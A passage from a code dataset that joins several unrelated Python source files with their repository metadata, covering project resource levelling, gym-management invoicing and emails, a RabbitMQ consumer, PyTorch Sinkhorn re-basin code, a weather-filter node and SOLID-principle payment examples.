int(ca[\"resource\"]) \n\t\t# allotted_resources_for_cp.shape = (1, self.project_duration + 1)\n\t\n\t\t# flexible_resource_allocation_matrix = np.zeros((1, self.project_duration + 1), dtype=int)\n\t\t\n\t\t# time_resource_matrix = np.concatenate((allotted_resources_for_cp, flexible_resource_allocation_matrix))\n\t\t# print(time_resource_matrix)\n\t\treturn allotted_resources_for_cp\n\n\tdef calculate_total_resources(self, node, allotted_resources_for_cp):\n\t\tallotted_resources = np.copy(allotted_resources_for_cp)\n\t\tfor a in self.node_matrix:\n\t\t\tif a[\"critical\"] == False and a[\"name\"] != node[\"name\"]:\n\t\t\t\tfor ind, value in enumerate(allotted_resources):\n\t\t\t\t\tif ind > int(a[\"OS\"]) and ind <= int(a[\"OF\"]):\n\t\t\t\t\t\tallotted_resources[ind] = value + int(a[\"resource\"]) \n\t\treturn allotted_resources\n\n\tdef is_all_node_moved(self):\n\t\tmoved = True\n\t\tfor node in self.node_matrix:\n\t\t\tif node[\"critical\"] == False:\n\t\t\t\tif int(node[\"ES\"]) == int(node[\"OS\"]):\n\t\t\t\t\tmoved = False\n\t\treturn moved\n\n\tdef burgess_scheduler1(self, allotted_resources_for_cp):\n\t\tsorted_node_matrix = sorted(self.node_matrix, key = lambda i: int(i['ES']), reverse=True)\n\t\twhile True:\n\t\t\tmin_sum = int(1e9)\n\t\t\tfor node in sorted_node_matrix:\n\t\t\t\tif node[\"critical\"] == False:\n\t\t\t\t\t# print(\"node\", node, \"\\n\")\n\t\t\t\t\tdes_os = int(1e9)\n\t\t\t\t\tdes_nodes = node[\"descendant\"]\n\t\t\t\t\tfor desN in des_nodes:\n\t\t\t\t\t\tdes_node = list(filter(lambda key: key['name'] == desN, self.node_matrix))\n\t\t\t\t\t\t# print(des_node, \"\\n\")\n\t\t\t\t\t\tif des_node[0]['OS'] < des_os:\n\t\t\t\t\t\t\tdes_os = des_node[0]['OS']\n\t\t\t\t\t\t\t# print(des_os, \"\\n\")\n\n\t\t\t\t\tallotted_resources = self.calculate_total_resources(node, allotted_resources_for_cp)\n\t\t\t\t\t# print(allotted_resources)\n\t\t\t\t\tself.delay_activity_resluts[node[\"name\"]] = int(1e9)\n\t\t\t\t\tfor i in range(1, node[\"slack\"]+1):\n\t\t\t\t\t\tif(int(node[\"EF\"])+i > des_os):\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\ttemp_alloted_resource = np.copy(allotted_resources)\n\t\t\t\t\t\tsum = 0\n\t\t\t\t\t\tfor ind, value in enumerate(temp_alloted_resource):\n\t\t\t\t\t\t\tif ind > int(node[\"ES\"])+i and ind <= int(node[\"EF\"])+i:\n\t\t\t\t\t\t\t\ttemp_alloted_resource[ind] = value + int(node[\"resource\"])\n\n\t\t\t\t\t\tsquare_resources = [r*r for r in temp_alloted_resource]\n\t\t\t\t\t\tsum = np.sum(square_resources)\n\t\t\t\t\t\t# print(\"Hi\", node['name'], i, \"\\n\")\n\t\t\t\t\t\t# print(self.delay_activity_resluts[node[\"name\"]], sum, \"\\n\")\n\t\t\t\t\t\tif sum < self.delay_activity_resluts[node[\"name\"]]:\n\t\t\t\t\t\t\tself.delay_activity_resluts[node[\"name\"]] = sum\n\t\t\t\t\t\t\tself.delay_activity_r[node[\"name\"]] = temp_alloted_resource\n\t\t\t\t\t\t\tself.delay_activity_r2[node[\"name\"]] = square_resources\n\t\t\t\t\t\t\tnode[\"OS\"] = int(node[\"ES\"]) + i \n\t\t\t\t\t\t\tnode[\"OF\"] = int(node[\"EF\"]) + i\n\t\t\t\t\tif self.delay_activity_resluts[node[\"name\"]] < min_sum and self.is_all_node_moved():\n\t\t\t\t\t\tmin_sum = self.delay_activity_resluts[node[\"name\"]]\n\t\t\tif min_sum < self.optimal_total_R_square:\n\t\t\t\tself.optimal_total_R_square = min_sum\n\t\t\telse:\n\t\t\t\tbreak \n\n\tdef burgess_scheduler2(self, allotted_resources_for_cp):\n\t\tsorted_node_matrix = sorted(self.node_matrix, key = lambda i: int(i['ES']), reverse=True)\n\t\twhile True:\n\t\t\tmin_sum = int(1e9)\n\t\t\tfor node in sorted_node_matrix:\n\t\t\t\tif 
node[\"critical\"] == False:\n\t\t\t\t\t# print(\"node\", node, \"\\n\")\n\t\t\t\t\tdes_os = int(1e9)\n\t\t\t\t\tdes_nodes = node[\"descendant\"]\n\t\t\t\t\tfor desN in des_nodes:\n\t\t\t\t\t\tdes_node = list(filter(lambda key: key['name'] == desN, self.node_matrix))\n\t\t\t\t\t\t# print(des_node, \"\\n\")\n\t\t\t\t\t\tif des_node[0]['OS'] < des_os:\n\t\t\t\t\t\t\tdes_os = des_node[0]['OS']\n\t\t\t\t\t\t\t# print(des_os, \"\\n\")\n\n\t\t\t\t\tallotted_resources = self.calculate_total_resources(node, allotted_resources_for_cp)\n\t\t\t\t\t# print(allotted_resources)\n\t\t\t\t\tself.delay_activity_resluts[node[\"name\"]] = int(1e9)\n\t\t\t\t\tfor i in range(0, node[\"slack\"]+1):\n\t\t\t\t\t\tif(int(node[\"EF\"])+i > des_os):\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\ttemp_alloted_resource = np.copy(allotted_resources)\n\t\t\t\t\t\tsum = 0\n\t\t\t\t\t\tfor ind, value in enumerate(temp_alloted_resource):\n\t\t\t\t\t\t\tif ind > int(node[\"ES\"])+i and ind <= int(node[\"EF\"])+i:\n\t\t\t\t\t\t\t\ttemp_alloted_resource[ind] = value + int(node[\"resource\"])\n\n\t\t\t\t\t\tsquare_resources = [r*r for r in temp_alloted_resource]\n\t\t\t\t\t\tsum = np.sum(square_resources)\n\t\t\t\t\t\t# print(\"Hi\", node['name'], i, \"\\n\")\n\t\t\t\t\t\t# print(self.delay_activity_resluts[node[\"name\"]], sum, \"\\n\")\n\t\t\t\t\t\tif sum < self.delay_activity_resluts[node[\"name\"]]:\n\t\t\t\t\t\t\tself.delay_activity_resluts[node[\"name\"]] = sum\n\t\t\t\t\t\t\tself.delay_activity_r[node[\"name\"]] = temp_alloted_resource\n\t\t\t\t\t\t\tself.delay_activity_r2[node[\"name\"]] = square_resources\n\t\t\t\t\t\t\tnode[\"OS\"] = int(node[\"ES\"]) + i \n\t\t\t\t\t\t\tnode[\"OF\"] = int(node[\"EF\"]) + i\n\t\t\t\t\tif self.delay_activity_resluts[node[\"name\"]] < min_sum:\n\t\t\t\t\t\tmin_sum = self.delay_activity_resluts[node[\"name\"]]\n\t\t\t# print(\"Min Sum\", min_sum) \n\t\t\t# self.print_burgess_schedule_details()\n\t\t\tif min_sum < self.optimal_total_R_square:\n\t\t\t\tself.optimal_total_R_square = min_sum\n\t\t\telse:\n\t\t\t\tbreak \n\n\n\tdef prepare_burgess_response(self):\n\t\tR_by_time = None\n\t\tR2_by_time = None\n\t\ttotal_R = 0\n\t\ttotal_R2 = int(self.optimal_total_R_square)\n\t\tnode_matrix = self.node_matrix\n\n\t\tnode_matrix = []\n\t\tfor i, node in enumerate(self.node_matrix):\n\t\t\tsingle_node = {}\n\t\t\tsingle_node[\"ES\"] = node[\"ES\"]\n\t\t\tsingle_node[\"OS\"] = node[\"OS\"]\n\t\t\tsingle_node[\"OF\"] = node[\"OF\"]\n\t\t\tsingle_node[\"LF\"] = node[\"LF\"]\n\t\t\tsingle_node[\"name\"] = node[\"name\"]\n\t\t\tsingle_node[\"resource\"] = node[\"resource\"]\n\t\t\tnode_matrix.append(single_node)\n\n\t\tfor node in self.node_matrix:\n\t\t\tif node[\"critical\"] == False: \n\t\t\t\tR_by_time = np.array(self.delay_activity_r[node[\"name\"]], dtype=int)\n\t\t\t\tR2_by_time = np.array(self.delay_activity_r2[node[\"name\"]], dtype=int)\n\t\t\t\ttotal_R = np.sum(R_by_time)\n\t\t\t\tbreak\n\t\t# R_by_time = R_by_time.astype('int')\n\t\treturn {\"node_matrix\": node_matrix, \"R_by_time\": R_by_time.tolist(), \"R2_by_time\": R2_by_time.tolist(), \n\t\t\t\"optimal_total_R\": int(total_R), \"optimal_total_R_square\": int(total_R2)}\n\n\n\tdef estimate_optimal_schedule_burgess1(self):\n\t\tself.initialize_OS_OF()\n\t\tself.separate_critical_activities()\n\t\tallotted_resources_for_cp = self.generate_time_resource_matrix()\n\t\tself.burgess_scheduler1(allotted_resources_for_cp)\n\t\tself.print_burgess_schedule_details()\n\t\t# print(self.prepare_burgess_response())\n\t\treturn 
self.prepare_burgess_response()\n\n\tdef estimate_optimal_schedule_burgess2(self):\n\t\tself.initialize_OS_OF()\n\t\tself.separate_critical_activities()\n\t\tallotted_resources_for_cp = self.generate_time_resource_matrix()\n\t\tself.burgess_scheduler2(allotted_resources_for_cp)\n\t\tself.print_burgess_schedule_details()\n\t\t\n\t\treturn self.prepare_burgess_response()\n\t\t\n\t\t","repo_name":"antanvir/project-resource-leveling","sub_path":"burgess_procedure.py","file_name":"burgess_procedure.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"28199741993","text":"import frappe\nfrom frappe import _, unscrub\nfrom frappe.utils import get_link_to_form, today, add_days, cint, format_date\n\nfrom frappe.core.doctype.communication.email import _make as make_communication\nfrom six import iteritems\n\ndef create_sales_invoice(self):\n try:\n si_doc = frappe.new_doc(\"Sales Invoice\")\n si_doc.customer = frappe.get_value(\"Gym Member\", self.gym_member, \"customer\")\n si_doc.posting_date = today()\n default_no_of_days_for_due_date = frappe.get_doc(\"Gym Settings\").default_no_of_days_for_due_date\n si_doc.due_date = add_days(si_doc.posting_date, default_no_of_days_for_due_date)\n\n default_item_key = \"default_membership_item\" if self.doctype == \"Gym Membership\" else \"default_subscription_item\"\n if default_item_key ==\"default_membership_item\":\n default_item = frappe.get_doc(\"Gym Settings\").default_membership_item\n else:\n default_item = frappe.get_doc(\"Gym Settings\").default_subscription_item\n\n if not default_item:\n frappe.throw(_(\"Please Define {} Item in {}\".format(unscrub(default_item_key), frappe.bold(get_link_to_form(\"Gym Settings\",\"Gym Settings\")))))\n \n si_doc.append('items', {\n 'item_code': default_item,\n 'qty': 1,\n 'rate': self.amount\n })\n\n si_doc.save(ignore_permissions=True)\n si_doc.submit()\n self.db_set('sales_invoice', si_doc.name)\n except Exception as e:\n frappe.logger(\"gym\").exception(e)\n\ndef send_weekly_summary_mails():\n try:\n def header(gym_member, start_date, end_date):\n return f\"\"\"Hey, {gym_member}
<br><br>\n            Here is your Weekly Summary for Gym Classes between {format_date(start_date)} and {format_date(end_date)}<br><br>\n            <table>\n            <tr>\n            <th>Type</th>\n            <th>Date</th>\n            </tr>\n            \"\"\"\n\n\n        def table(class_type, date):\n            date = format_date(date)\n            return \"\"\"\n                <tr>\n                <td>{}</td>\n                <td>{}</td>\n                </tr>\n            \"\"\".format(class_type, date)\n\n        def footer():\n            return \"\"\"\n            </table><br>
\n Thank you for your active participation and inputs, We hope you enjoyed the experience.\n \"\"\"\n \n start_date = add_days(today(), -7)\n end_date = today()\n class_booking_data = frappe.db.get_all(\"Gym Class Booking\", \n {\"docstatus\": 1, \"date\": [\"between\", (start_date, end_date)]},\n [\"class_type\", \"gym_member\", \"date\"], order_by= \"date asc\")\n\n gym_member_dict = {}\n for row in class_booking_data:\n if row.gym_member not in gym_member_dict:\n gym_member_dict[row.gym_member] = [row]\n else:\n gym_member_dict[row.gym_member].append(row)\n \n for gym_member, details in iteritems(gym_member_dict):\n table_content = ''\n for row in details:\n table_content += table(row.class_type, row.date)\n\n message = header(gym_member, start_date, end_date) + '' + table_content + '' + footer()\n recipient = frappe.db.get_value(\"Gym Member\", gym_member, \"email_id\")\n try:\n frappe.sendmail(\n recipients= recipient,\n subject = 'Weekly Summary of Gym Classes',\n message = message,\n )\n\n make_communication(\n content= message,\n subject= 'Weekly Summary of Gym Classes',\n recipients= recipient,\n communication_medium=\"Email\",\n send_email=False,\n communication_type=\"Automated Message\",\n )\n\n except Exception as e:\n frappe.logger(\"gym\").exception(e)\n frappe.log_error(\"GYM Mail Sending Issue\", frappe.get_traceback())\n continue\n except Exception as e:\n frappe.logger(\"gym\").exception(e)\n frappe.log_error(\"GYM Mail Sending Issue\", frappe.get_traceback())","repo_name":"Vikas8600/gym-management-system","sub_path":"gym_management_system/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39822903671","text":"import pika\n\n# 建立连接\nuserx = pika.PlainCredentials(\"guest\", \"guest\")\nconn = pika.BlockingConnection(pika.ConnectionParameters(\"127.0.0.1\", 5672, '/', credentials=userx))\n\n# 开辟管道\nchannelx = conn.channel()\n\n# 声明队列,参数为队列名\nchannelx.queue_declare(queue=\"modelProcess\")\n\n\n# 消息处理函数,执行完成才说明接收完成,此时才可以接收下一条,串行\ndef dongcallbackfun(v1, v2, v3, bodyx):\n messageJson = eval(bodyx.decode('utf-8'))\n print(\"得到的数据为:\", messageJson)\n print(type(messageJson))\n\n\n# 接收准备\nchannelx.basic_consume(\n \"modelProcess\", # 队列名\n dongcallbackfun, # 收到消息的回调函数\n True, # 是否发送消息确认\n )\nprint(\"-------- 开始接收数据 -----------\")\n\n# 开始接收消息\nchannelx.start_consuming()\n","repo_name":"ljjwyn/algorithm_python","sub_path":"rabbitmq/consume.py","file_name":"consume.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"11111070452","text":"import torch\nfrom copy import deepcopy\nfrom .sinkhorn import Sinkhorn, matching\nfrom .graph.auto_graph import solve_graph\n\n\nclass ReparamNet(torch.nn.Module):\n def __init__(self, model, permutation_type=\"mat_mul\"):\n super().__init__()\n _permutation_types = [\"mat_mul\", \"broadcast\"]\n assert (\n permutation_type in _permutation_types\n ), \"Permutation type must be in {}\".format(_permutation_types)\n self.permutation_type = permutation_type\n self.output = deepcopy(model)\n self.model = deepcopy(model)\n for p1, p2 in zip(self.model.parameters(), self.output.parameters()):\n p1.requires_grad = False\n p2.requires_grad = False\n\n def set_model(self, model):\n self.model = deepcopy(model)\n for p1 in self.model.parameters():\n p1.requires_grad = False\n\n def training_rebasin(self, P):\n for (name, p1), 
p2 in zip(\n self.output.named_parameters(), self.model.parameters()\n ):\n if (\n name not in self.map_param_index\n or name not in self.map_prev_param_index\n ):\n continue\n i = self.perm_dict[self.map_param_index[name]]\n j = (\n self.perm_dict[self.map_prev_param_index[name]]\n if self.map_prev_param_index[name] is not None\n else None\n )\n\n if \"bias\" in name[-4:]:\n if i is not None:\n p1.copy_(P[i] @ p2)\n else:\n continue\n\n # batchnorm\n elif len(p1.shape) == 1:\n if i is not None:\n p1.copy_((P[i] @ p2.view(p1.shape[0], -1)).view(p2.shape))\n\n # mlp / cnn\n elif \"weight\" in name[-6:]:\n if i is not None and j is None:\n p1.copy_((P[i] @ p2.view(P[i].shape[0], -1)).view(p2.shape))\n\n if i is not None and j is not None:\n p1.copy_(\n (\n P[j].view(1, *P[j].shape)\n @ (P[i] @ p2.view(P[i].shape[0], -1)).view(\n p2.shape[0], P[j].shape[0], -1\n )\n ).view(p2.shape)\n )\n\n if i is None and j is not None:\n p1.copy_(\n (\n P[j].view(1, *P[j].shape)\n @ p2.view(p2.shape[0], P[j].shape[0], -1)\n ).view(p2.shape)\n )\n\n def update_batchnorm(self, model):\n for m1, m2 in zip(self.model.modules(), model.modules()):\n if \"BatchNorm\" in str(type(m2)):\n if m2.running_mean is None:\n m1.running_mean = None\n else:\n m1.running_mean.copy_(m2.running_mean)\n if m2.running_var is None:\n m1.running_var = None\n m1.track_running_stats = False\n else:\n m1.running_var.copy_(m2.running_var)\n\n def permute_batchnorm(self, P):\n for (name, m1), m2 in zip(self.output.named_modules(), self.model.modules()):\n if \"BatchNorm\" in str(type(m2)):\n if name + \".weight\" in self.map_param_index:\n if m2.running_mean is None and m2.running_var is None:\n continue\n i = self.perm_dict[self.map_param_index[name + \".weight\"]]\n index = (\n torch.argmax(P[i], dim=1)\n if i is not None\n else torch.arange(m2.running_mean.shape[0])\n )\n m1.running_mean.copy_(m2.running_mean[index, ...])\n m1.running_var.copy_(m2.running_var[index, ...])\n\n def eval_rebasin(self, P):\n for (name, p1), p2 in zip(\n self.output.named_parameters(), self.model.parameters()\n ):\n if (\n name not in self.map_param_index\n or name not in self.map_prev_param_index\n ):\n continue\n i = self.perm_dict[self.map_param_index[name]]\n j = (\n self.perm_dict[self.map_prev_param_index[name]]\n if self.map_prev_param_index[name] is not None\n else None\n )\n\n if \"bias\" in name[-4:]:\n if i is not None:\n index = torch.argmax(P[i], dim=1)\n p1.copy_(p2.data[index, ...])\n else:\n continue\n\n # batchnorm\n elif len(p1.shape) == 1:\n if i is not None:\n index = torch.argmax(P[i], dim=1)\n p1.copy_(p2.data[index, ...])\n\n # mlp / cnn\n elif \"weight\" in name[-6:]:\n if i is not None and j is None:\n index = torch.argmax(P[i], dim=1)\n p1.copy_(p2.data.view(P[i].shape[0], -1)[index, ...].view(p2.shape))\n\n if i is not None and j is not None:\n index = torch.argmax(P[i], dim=1)\n p1.copy_(p2.data[index, ...])\n index = torch.argmax(P[j], dim=1)\n p1.copy_(p1.data[:, index, ...])\n\n if i is None and j is not None:\n index = torch.argmax(P[j], dim=1)\n p1.copy_(\n (\n p2.data.view(p2.shape[0], P[j].shape[0], -1)[:, index, ...]\n ).view(p2.shape)\n )\n\n def forward(self, P):\n for p1, p2 in zip(self.output.parameters(), self.model.parameters()):\n p1.data = p2.data.clone()\n\n for p1 in self.output.parameters():\n p1._grad_fn = None\n\n if self.training or self.permutation_type == \"mat_mul\":\n self.training_rebasin(P)\n else:\n self.eval_rebasin(P)\n\n self.permute_batchnorm(P)\n\n return self.output\n\n def to(self, 
device):\n self.output.to(device)\n self.model.to(device)\n\n return self\n\n\nclass RebasinNet(torch.nn.Module):\n def __init__(\n self,\n model,\n input_shape,\n remove_nodes=list(),\n l=1.0,\n tau=1.0,\n n_iter=20,\n operator=\"implicit\",\n permutation_type=\"mat_mul\",\n ):\n super().__init__()\n assert operator in [\n \"implicit\",\n ], \"Operator must be either `implicit`\"\n\n self.reparamnet = ReparamNet(model, permutation_type=permutation_type)\n self.param_precision = next(iter(model.parameters())).data.dtype\n input = torch.randn(input_shape, dtype=self.param_precision)\n perm_dict, n_perm, permutation_g, parameter_map = solve_graph(\n model, input, remove_nodes=remove_nodes\n )\n\n P_sizes = [None] * n_perm\n map_param_index = dict()\n map_prev_param_index = dict()\n nodes = list(permutation_g.nodes.keys())\n for name, p in model.named_parameters():\n if parameter_map[name] not in nodes:\n continue\n else:\n map_param_index[name] = permutation_g.naming[parameter_map[name]]\n parents = permutation_g.parents(parameter_map[name])\n map_prev_param_index[name] = (\n None if len(parents) == 0 else permutation_g.naming[parents[0]]\n )\n\n if \"weight\" in name[-6:]:\n if len(p.shape) == 1: # batchnorm\n pass # no permutation : bn is \"part\" for the previous one like biais\n else:\n if (\n map_param_index[name] is not None\n and perm_dict[map_param_index[name]] is not None\n ):\n perm_index = perm_dict[map_param_index[name]]\n P_sizes[perm_index] = (p.shape[0], p.shape[0])\n\n self.reparamnet.map_param_index = map_param_index\n self.reparamnet.map_prev_param_index = map_prev_param_index\n self.reparamnet.perm_dict = perm_dict\n\n self.p = torch.nn.ParameterList(\n [\n torch.nn.Parameter(\n torch.eye(ps[0], dtype=self.param_precision)\n + torch.randn(ps, dtype=self.param_precision) * 0.1,\n requires_grad=True,\n )\n if ps is not None\n else None\n for ps in P_sizes\n ]\n )\n\n self.l = l\n self.tau = tau\n self.n_iter = n_iter\n self.operator = operator\n\n def update_batchnorm(self, model):\n self.reparamnet.update_batchnorm(model)\n\n def random_init(self):\n for p in self.p:\n ci = torch.randperm(p.shape[0])\n p.data = (torch.eye(p.shape[0])[ci, :]).to(p.data.device)\n\n def identity_init(self):\n for p in self.p:\n p.data = torch.eye(p.shape[0]).to(p.data.device)\n\n def eval(self):\n self.reparamnet.eval()\n return super().eval()\n\n def train(self, mode: bool = True):\n self.reparamnet.train(mode)\n return super().train(mode)\n\n def forward(self, x=None):\n\n if self.training:\n gk = list()\n for i in range(len(self.p)):\n if self.operator == \"implicit\":\n sk = Sinkhorn.apply(\n -self.p[i] * self.l,\n torch.ones((self.p[i].shape[0])).to(self.p[0].device),\n torch.ones((self.p[i].shape[1])).to(self.p[0].device),\n self.n_iter,\n self.tau,\n )\n\n gk.append(sk)\n\n else:\n gk = [\n matching(p.cpu().detach().numpy())\n .to(self.param_precision)\n .to(self.p[0].device)\n for p in self.p\n ]\n\n m = self.reparamnet(gk)\n if x is not None and x.ndim == 1:\n x.unsqueeze_(0)\n\n if x is not None:\n return m(x)\n\n return m\n\n def zero_grad(self, set_to_none: bool = False) -> None:\n self.reparamnet.output.zero_grad(set_to_none)\n return super().zero_grad(set_to_none)\n\n def parameters(self, recurse: bool = True):\n return self.p.parameters(recurse)\n\n def to(self, device):\n for p in self.p:\n if p is not None:\n p.data = p.data.to(device)\n\n return 
self\n","repo_name":"fagp/sinkhorn-rebasin","sub_path":"rebasin/rebasinnet/symmnet.py","file_name":"symmnet.py","file_ext":"py","file_size_in_byte":10697,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"22104742605","text":"import os\nfrom configparser import ConfigParser\n\nimport common.env_utils\nimport common.network.constants\nimport common.supervisor.utils\nfrom common.processing_node.queue_consumer.queue_consumer import QueueConsumer\n\nfrom common.rabbitmq.queue import Queue\nfrom common.rabbitmq.exchange_writer import ExchangeWriter\nfrom common.processing_node.queue_consumer.output_processor.forwarding_output_processor import ForwardingOutputProcessor\nfrom common.processing_node.stateless_node import StatelessNode\nfrom common.processing_node.queue_consumer.eof_handler import EOFHandler\n\nfrom weather_filter_process_input import weather_filter_process_input\n\n\ndef read_config():\n config = ConfigParser(os.environ)\n config.read(\"config.ini\")\n\n return config[\"DEFAULT\"]\n\n\ndef main():\n config = common.env_utils.read_config()\n\n queue_bindings = common.env_utils.parse_queue_bindings(config['UNFILTERED_WEATHER_QUEUE_BINDINGS'])\n input_queue_reader = Queue(\n hostname=config['RABBITMQ_HOSTNAME'],\n name=config['UNFILTERED_WEATHER_QUEUE_NAME'],\n bindings=queue_bindings\n )\n\n output_exchange_writer = ExchangeWriter(\n hostname=config['RABBITMQ_HOSTNAME'],\n exchange_name=config['FILTERED_WEATHER_EXCHANGE_NAME'],\n queue_name=config['FILTERED_WEATHER_QUEUE_NAME']\n )\n\n forwarding_output_processor = ForwardingOutputProcessor(\n n_output_peers=1,\n output_exchange_writer=output_exchange_writer,\n output_eof=common.network.constants.WEATHER_END_ALL,\n forward_with_routing_key=True\n )\n\n queue_consumer = QueueConsumer(\n process_input=weather_filter_process_input,\n input_eofs=[common.network.constants.WEATHER_END_ALL],\n n_input_peers=1,\n input_queue=input_queue_reader,\n output_processor=forwarding_output_processor,\n eof_handler=EOFHandler(\".eof\")\n )\n\n processing_node = StatelessNode(\n queue_consumer=queue_consumer,\n supervisor_process=common.supervisor.utils.create_from_config(config)\n )\n\n processing_node.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PBrrtrn/PBrrtrn-sistemas-distribuidos-tp2-98446","sub_path":"backend/weather_filter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40939885822","text":"joy_hp = 100\njoy_ack = 10\njoy_def = 5\njoy_level = 1\njoy_exp = 0\n\njoy_exp += 100\n\njoy_level += 1\njoy_hp += 10\njoy_ack += 2\njoy_def += 1\n\njoy_exp += 230\n\n\n################3\n\nclass Role:\n\n def __init__(self):\n self.hp = 100\n self.ack = 10\n self.def_ = 5\n self.level = 1\n self.exp = 0\n \n def add_exp(self, exp):\n self.exp += exp\n while self.exp >= 100:\n self.level_up()\n \n def level_up(self):\n self.hp += 10\n self.ack += 2\n self.def_ += 1\n self.exp -= 100\n\n\njoy = Role()\njoy.add_exp(380)\nprint(joy.hp)\n","repo_name":"HzyAlex/CS101","sub_path":"nba website/website/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9885885741","text":"import ifcopenshell\nimport ifcopenshell.util.unit\n\n\nclass Usecase:\n def __init__(self, file, **settings):\n self.file = file\n self.settings = 
{\"name\": \"foot\", \"conversion_offset\": None}\n for key, value in settings.items():\n self.settings[key] = value\n\n def execute(self):\n unit_type = ifcopenshell.util.unit.imperial_types.get(self.settings[\"name\"], \"USERDEFINED\")\n dimensions = ifcopenshell.util.unit.named_dimensions[unit_type]\n exponents = self.file.createIfcDimensionalExponents(*dimensions)\n si_name = ifcopenshell.util.unit.si_type_names[unit_type]\n si_unit = self.file.createIfcSIUnit(UnitType=unit_type, Name=si_name)\n\n conversion_real = ifcopenshell.util.unit.si_conversions.get(self.settings[\"name\"], 1)\n value_component = self.file.create_entity(\"IfcReal\", **{\"wrappedValue\": conversion_real})\n conversion_factor = self.file.createIfcMeasureWithUnit(value_component, si_unit)\n\n conversion_offset = self.settings[\"conversion_offset\"]\n if not conversion_offset:\n conversion_offset = ifcopenshell.util.unit.si_offsets.get(self.settings[\"name\"], 0)\n\n if conversion_offset:\n return self.file.createIfcConversionBasedUnitWithOffset(\n exponents, unit_type, self.settings[\"name\"], conversion_factor, conversion_offset,\n )\n return self.file.createIfcConversionBasedUnit(\n exponents, unit_type, self.settings[\"name\"], conversion_factor\n )\n","repo_name":"vulevukusej/BlenderBIM","sub_path":"standalone scripts for ifcopenshell/ifcopenshell/api/unit/add_conversion_based_unit.py","file_name":"add_conversion_based_unit.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"18192640710","text":"#sale system\r\nfrom abc import ABC, abstractmethod\r\n\r\nclass Order:\r\n items = []\r\n quantities = []\r\n prices = []\r\n status = \"Open\"\r\n\r\n def add_item(self, name, quantity, price):\r\n self.items.append(name)\r\n self.quantities.append(quantity)\r\n self.prices.append(price)\r\n\r\n def total_price(self):\r\n total = 0\r\n for i in range(len(self.prices)):\r\n total += self.quantities[i] * self.prices[i]\r\n return total\r\n \r\n ''' (1 -> SRP)\r\n Sem Single responsability, a classe order fica responsável pela\r\n gerência do pedido (adicionar item e calcular o preço, que são \r\n realmente responsabilidades da classe), mas também fica responsável\r\n pelo pagamento, o que fere o SRP\r\n def pay(self, payment_type, security_code):\r\n if payment_type == \"debit\":\r\n print(\"Processing debit payment type\")\r\n print(f\"Verifying security code: {security_code}\")\r\n self.status = \"paid\"\r\n elif payment_type == \"credit\":\r\n print(\"Processing credit payment type\")\r\n print(f\"Verifying security code: {security_code}\")\r\n self.status = \"paid\"\r\n else:\r\n raise Exception(f\"Unknown payment method: {payment_type}\")\r\n '''\r\n\r\n#(1 -> SRP)\r\n#Para adequar ao SRP é necessário criar uma nova classe que cuide do pagamento\r\n'''\r\nclass PaymentProcessor:\r\n def pay_credit(self, order, security_code):\r\n print(\"Processing credit payment type\")\r\n print(f\"Verifying security code {security_code}\")\r\n order.status = \"paid\" #uma vez que é preciso passar a order para ser verificada\r\n #já que a classe foi \"quebrada\" para atender o SRP\r\n\r\n def pay_debit(self, order, security_code):\r\n print(\"Processing debit payment type\")\r\n print(f\"Verifying security code {security_code}\")\r\n order.status = \"paid\" #uma vez que é preciso passar a order para ser verificada\r\n #já que a classe foi \"quebrada\" para atender o SRP\r\n'''\r\n\r\n#(2 -> Open/Closed) \r\n'''\r\nBasicamente, 
criarmos uma classe abstrata que é aberta para extensão,\r\nporém fechada para modificação, ou seja, podemos usar essa classe para\r\ncriar novas classes \"mais específicas\" com base na classe abstrata\r\n'''\r\n#classe aberta que define a base dos pagamentos genéricos\r\n'''\r\nclass PaymentProcessor(ABC):\r\n @abstractmethod\r\n def pay(self, order, security_code):\r\n pass\r\n\r\nclass DebitPaymentProcessor(PaymentProcessor):\r\n def pay(self, order, security_code):\r\n print(\"Processing debit payment type\")\r\n print(f\"Verifying security code: {security_code}\")\r\n order.status = \"paid\"\r\n\r\nclass CreditPaymentProcessor(PaymentProcessor):\r\n def pay(self, order, security_code):\r\n print(\"Processing credit payment type\")\r\n print(f\"Verifying security code: {security_code}\")\r\n order.status = \"paid\"\r\n'''\r\n#(3 -> Liskov substitytion principle)\r\n'''\r\nAqui, retiramos o security_code, pois uma das funções de pagamento/\r\nprocessor de pagamento, não precisava desse atributo específico, mas\r\nsim de um substituto pra ele.\r\nNesse caso, o Liskov diz que não é necessário herdar tudo. Podemos apenas\r\ninicializar o que precisamos dentro dos processors, exemplo: se credit e debit\r\nprocessors, precisam do security code, basta inicializarmos dentro deles. E\r\ncomo o pay pal precisa de um e-mail, inicializamos, dentro do processor de pay pal,\r\nassimm, cada um fica com sua particularidade, sem ser obrigado pela classe na\r\nqual estão herdando.\r\n'''\r\n\r\n# (5 -> Dependency Inversion)\r\n'''\r\nSignifica dizer que queremos que nossas classes dependam de classes abstratas\r\nnão de classes ou subclasses concretas (no exemplo, temos DebitPaymentProcessor\r\ne PayPalPaymentProcessor dependendo da classe concreta SMSAuth), por isso criaremos\r\numa classe abstrata.\r\nCriando a classe abstrata abaixo, podemos criar outras classes de autorização\r\n'''\r\nclass Authorizer(ABC):\r\n @abstractmethod\r\n def is_authorized(self) -> bool:\r\n pass\r\n\r\n#(4 -> Interface segregation utilizando composição)\r\nclass SMSAuth(Authorizer):\r\n authorized = False\r\n\r\n def verify_code(self, code):\r\n #Aqui está autorizando tudo por padrão\r\n print(f\"Verifying code 